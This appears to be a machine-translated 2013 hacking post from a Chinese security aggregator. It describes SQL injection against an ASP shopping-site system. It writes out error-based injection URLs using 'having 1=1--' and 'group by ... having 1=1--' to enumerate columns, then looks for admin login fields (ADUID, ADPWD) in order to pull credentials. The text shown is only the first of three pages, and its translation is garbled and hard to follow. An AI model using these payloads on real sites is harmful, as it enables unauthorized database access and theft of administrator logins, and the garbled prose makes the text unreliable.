GOOGLE shopping built Station system injection vulnerability-vulnerability warning-the black bar safety net

2013-03-29T00:00:00
ID MYHACK58:62201338027
Type myhack58
Reporter 佚名
Modified 2013-03-29T00:00:00

Description

Find an injection point

http://www.xxx.com /Diary_A. asp? UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389

Habitual plus’having1=1--

http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—

!

Broke Diary_A. dl_Title(this time very excited.)

Then continue to

http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—

Continue to, has been a blast to go down

Blast to several field and table section but didn't find the need to the manage user fields

Possibly a what to do and then go backstage landing page to see the source code

!

Input name= “ADUID”

Input name= “ADPWD”

Very lucky to find a field that will continue to

[1] [2] [3] next